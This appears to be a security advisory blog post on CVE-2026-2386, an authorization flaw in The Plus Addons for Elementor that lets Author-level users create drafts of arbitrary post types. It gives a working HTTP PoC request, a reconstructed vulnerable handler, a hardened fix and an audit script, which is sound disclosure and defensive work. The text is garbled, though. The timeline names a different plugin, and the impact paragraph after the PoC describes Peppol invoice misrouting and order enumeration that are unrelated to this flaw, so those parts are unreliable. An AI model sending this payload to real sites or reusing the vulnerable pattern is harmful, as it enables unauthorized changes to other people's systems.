CVE-2026-2386 affects The Plus Addons for Elementor and it is an incorrect authorization vulnerability that lets a low privilege Elementor user create draft objects of post types they normally should not be able to create. The most important detail is that this is not about editing existing content. It is about crossing post type boundaries. An Author who only has edit_posts can still create draft Pages, Elementor templates, and other custom post types by supplying a client controlled post_type to an AJAX endpoint. That breaks the expectation that post type capabilities are enforced by WordPress, and it creates a security and governance problem because draft assets can be planted for later misuse. On sites with complex workflows, even draft creation can have side effects such as triggering automation, polluting template libraries, confusing editors, and setting up social engineering for administrators.
| Field | Value |
| --- | --- |
| CVE | CVE-2026-2386 |
| Plugin | The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce |
| All-time downloads | 5 940 223 |
| Active installations | 100 000+ |
| Publicly published | February 18, 2026 |
| Last updated | February 18, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2386 , https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-plus-addons-for-elementor-page-builder/the-plus-addons-for-elementor-addons-for-elementor-page-templates-widgets-mega-menu-woocommerce-647-incorrect-authorization-to-authenticated-author-arbitrary-draft-post-creation-via-post-type |
Timeline
| Date | Event |
| --- | --- |
| February 6, 2026 | Plugin testing and vulnerability detection in Unlimited Elements for Elementor completed |
| February 6, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 17, 2026 | Registered CVE-2026-2386 |
Discovery of the Vulnerability
The vulnerable surface is the AJAX endpoint wp-admin/admin-ajax.php?action=tpae_create_page, implemented in the theme builder controls code. The handler verifies a nonce with check_ajax_referer for the tp_nxt_install action, which is a request integrity control, but it authorizes the caller only with current_user_can( 'edit_posts' ). It then accepts post_type and page_name directly from POST and calls wp_insert_post with a fixed post_status of draft. For post types like elementor_library and nxt_builder, it also writes template metadata that can make the new object appear as a valid Elementor template entry. The critical missing control is a post-type-specific capability check. WordPress defines per-post-type capability mappings, and creating objects of a post type should require that post type's create_posts capability or an equivalent. Because the handler does not enforce that and trusts the attacker-supplied post_type, any role that can access Elementor and has edit_posts can create drafts of arbitrary registered post types.
Understanding Missing Auth Attacks
WordPress capability checks are not generic. edit_posts does not mean "create anything"; it typically means the user can create and edit standard posts. Pages and many custom post types have different caps. Elementor templates are also stored as their own post type and are normally restricted because template assets influence site-wide presentation. CVE-2026-2386 violates that model by using a broad capability check and letting the client choose the target object type. This is a common authorization anti-pattern: developers check one baseline capability and assume it implies permission for a more privileged action. In real deployments, cross-post-type draft creation can be abused in several ways. Attackers can fill the template library with misleading assets named to look legitimate, create drafts that appear in admin lists and clutter workflows, and plant content that administrators later publish by mistake. On sites with sensitive custom post types, mere creation might trigger hooks, indexing, or notifications, so creation itself can become a side-effect attack vector even without publish privileges.
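The paragraph above explains why creation alone matters: the draft exists even though its author could never have passed the post type's own create check. A defender-side audit follows directly from that observation. The following script is an added example, not code from The Plus Addons or from this advisory: it lists draft objects whose author lacks the create_posts capability of that object's post type, which is exactly the check the vulnerable endpoint skipped. The function name, the post type list passed at the bottom, and the tab-separated output format are assumptions for the example; run it inside the site with WP-CLI (`wp eval-file example_audit_drafts.php`).

```php
<?php
// Added example (not the plugin's or the advisory's code): find drafts whose author
// lacks the create capability of the draft's own post type.
// Intended to be run via WP-CLI: wp eval-file example_audit_drafts.php

function example_find_suspicious_drafts( array $post_types ) {
    $findings = array();

    // All drafts of the requested types, newest first. suppress_filters avoids
    // plugin query filters hiding rows from the audit.
    $drafts = get_posts( array(
        'post_type'        => $post_types,
        'post_status'      => 'draft',
        'numberposts'      => -1,
        'orderby'          => 'date',
        'order'            => 'DESC',
        'suppress_filters' => true,
    ) );

    foreach ( $drafts as $draft ) {
        $pto = get_post_type_object( $draft->post_type );
        if ( ! $pto ) {
            continue; // type no longer registered; nothing to compare against
        }

        // WordPress maps create_posts per post type (edit_pages for pages, etc.).
        // If the author cannot satisfy that cap today, the draft was most likely
        // created through a path that bypassed the type-specific check.
        $author_id = (int) $draft->post_author;
        if ( ! user_can( $author_id, $pto->cap->create_posts ) ) {
            $user       = get_userdata( $author_id );
            $findings[] = array(
                'id'      => $draft->ID,
                'type'    => $draft->post_type,
                'author'  => $user ? $user->user_login : 'unknown(' . $author_id . ')',
                'created' => $draft->post_date,
                'title'   => $draft->post_title,
            );
        }
    }

    return $findings;
}

// Post types named in the advisory; extend with any custom types your site registers.
$rows = example_find_suspicious_drafts( array( 'page', 'elementor_library', 'nxt_builder' ) );

if ( empty( $rows ) ) {
    echo "No drafts found whose author lacks the post type's create capability.\n";
}
foreach ( $rows as $row ) {
    printf( "%d\t%s\t%s\t%s\t%s\n", $row['id'], $row['type'], $row['author'], $row['created'], $row['title'] );
}
```

The check is deliberately evaluated against the author's current capabilities, so a draft created by a user who was later demoted will also surface; treat the output as a review list, not as proof of exploitation.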
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-2386, an attacker with Author+ cookies sends the following request.
PoC:
```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=491&action=elementor
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Author+ Cookies
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=tpae_create_page&security=theplus_editor_theme_builder.nonce_from_elementor_page&post_type=elementor_library&page_name=Injected+Template+Title____
```
The most serious outcome is misrouting of electronic invoices and structured EDI messages. If Peppol endpoint identifiers are used to route documents, an attacker can cause invoices to be delivered to the wrong recipient endpoint, which can expose business document data and create compliance issues. Even when misrouting does not leak full documents, corrupting endpoint identifiers can break invoicing flows, delay fulfilment, and create customer support incidents that are expensive to resolve. Another realistic scenario is broad data corruption through enumeration. Order IDs are typically sequential, so an attacker can iterate order_id values and poison many accounts quickly, especially if the access key is reusable across actions. This becomes an integrity and availability issue for back office operations because staff must identify and restore correct identifiers and potentially reissue documents. It is also a stealth risk. These changes can blend into normal system behavior and may not be noticed until invoices fail or are delivered incorrectly, which means attackers can create delayed impact sabotage that is hard to trace back.
Recommendations for Improved Security
The correct fix is to enforce post-type-specific authorization rather than relying on edit_posts. The handler should validate the requested post_type against a strict allow list of supported types and then check the appropriate capability for that type, such as the post type object's create_posts or edit_posts cap mapping; for pages that means edit_pages or a create_pages equivalent. For Elementor templates, it should require a capability that only trusted roles have, or explicitly restrict template creation to administrators. Input validation should enforce a safe page_name length and character set, and the endpoint should be rate-limited to prevent bulk abuse. From an operational perspective, site owners should review which roles have Elementor editor access, because Elementor access combined with edit_posts is often granted broadly. Audit your elementor_library and related template post lists for unexpected drafts created by low-privilege users, and consider monitoring for spikes in wp_insert_post activity triggered through admin-ajax endpoints. Applying least privilege to editor access and keeping plugins patched reduces the chance that a simple Author account becomes a content-plane attacker.
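To make the Discovery description and the fix above concrete, here is an added example that is not The Plus Addons' own code: first a hypothetical reconstruction of the handler pattern the advisory describes (nonce check plus a single edit_posts check, with the client choosing post_type), then a hardened version that validates post_type against an allow list and checks the capability WordPress maps for that type. The example_ function names, the wp_ajax_example_create_page action name, the choice of manage_options for template types, the 200-byte title limit, and the template meta key are all assumptions for the example; the tp_nxt_install nonce action and the security parameter name come from the advisory.

```php
<?php
// Added example (not the plugin's code). Function names, the AJAX action name,
// the template meta key and the limits below are assumptions for illustration.

// ---- Vulnerable pattern, reconstructed from the advisory's description ----
function example_create_page_vulnerable() {
    check_ajax_referer( 'tp_nxt_install', 'security' ); // integrity of the request only
    if ( ! current_user_can( 'edit_posts' ) ) {         // one baseline cap for every post type
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // post_type is chosen by the client and never tied to a type-specific capability.
    $post_type = isset( $_POST['post_type'] ) ? sanitize_key( wp_unslash( $_POST['post_type'] ) ) : 'page';
    $page_name = isset( $_POST['page_name'] ) ? sanitize_text_field( wp_unslash( $_POST['page_name'] ) ) : '';

    $post_id = wp_insert_post( array(
        'post_title'  => $page_name,
        'post_type'   => $post_type,
        'post_status' => 'draft',
    ), true );
    if ( ! is_wp_error( $post_id ) && 'elementor_library' === $post_type ) {
        update_post_meta( $post_id, '_example_template_type', 'page' ); // placeholder meta key
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}

// ---- Hardened version ----

// Types this endpoint may create. null means "use the post type's own create_posts cap";
// a string overrides it with a stricter capability. The entries are assumptions.
function example_allowed_post_types() {
    return array(
        'page'              => null,
        'elementor_library' => 'manage_options', // templates shape the whole site: admins only
        'nxt_builder'       => 'manage_options',
    );
}

// Type-specific authorization: the check that edit_posts alone does not provide.
function example_user_can_create( $post_type ) {
    $allowed = example_allowed_post_types();
    if ( ! array_key_exists( $post_type, $allowed ) || ! post_type_exists( $post_type ) ) {
        return false; // not on the allow list (or not registered): deny
    }
    if ( null !== $allowed[ $post_type ] ) {
        return current_user_can( $allowed[ $post_type ] );
    }
    $pto = get_post_type_object( $post_type );
    // WordPress maps create_posts per type (e.g. edit_pages for pages).
    return current_user_can( $pto->cap->create_posts );
}

function example_create_page_hardened() {
    check_ajax_referer( 'tp_nxt_install', 'security' );

    $post_type = isset( $_POST['post_type'] ) ? sanitize_key( wp_unslash( $_POST['post_type'] ) ) : '';
    $page_name = isset( $_POST['page_name'] ) ? sanitize_text_field( wp_unslash( $_POST['page_name'] ) ) : '';

    if ( ! example_user_can_create( $post_type ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // Bounded, non-empty title (200 bytes is an assumed limit).
    if ( '' === $page_name || strlen( $page_name ) > 200 ) {
        wp_send_json_error( array( 'message' => 'invalid page_name' ), 400 );
    }

    $post_id = wp_insert_post( array(
        'post_title'  => $page_name,
        'post_type'   => $post_type,
        'post_status' => 'draft',
        'post_author' => get_current_user_id(),
    ), true );
    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( array( 'message' => $post_id->get_error_message() ), 500 );
    }
    if ( 'elementor_library' === $post_type ) {
        update_post_meta( $post_id, '_example_template_type', 'page' ); // placeholder meta key
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}
add_action( 'wp_ajax_example_create_page', 'example_create_page_hardened' );
```

The allow list is consulted before the capability lookup on purpose: a request naming a post type the feature never intended to create is rejected even when the caller would have the capability, so adding a new custom post type to the site does not silently widen what this endpoint can do. Rate limiting is left to a reverse proxy or WAF in front of admin-ajax.php, since the handler itself has no state in which to count requests.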
By taking proactive measures to address Missing Auth like CVE-2026-2386 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
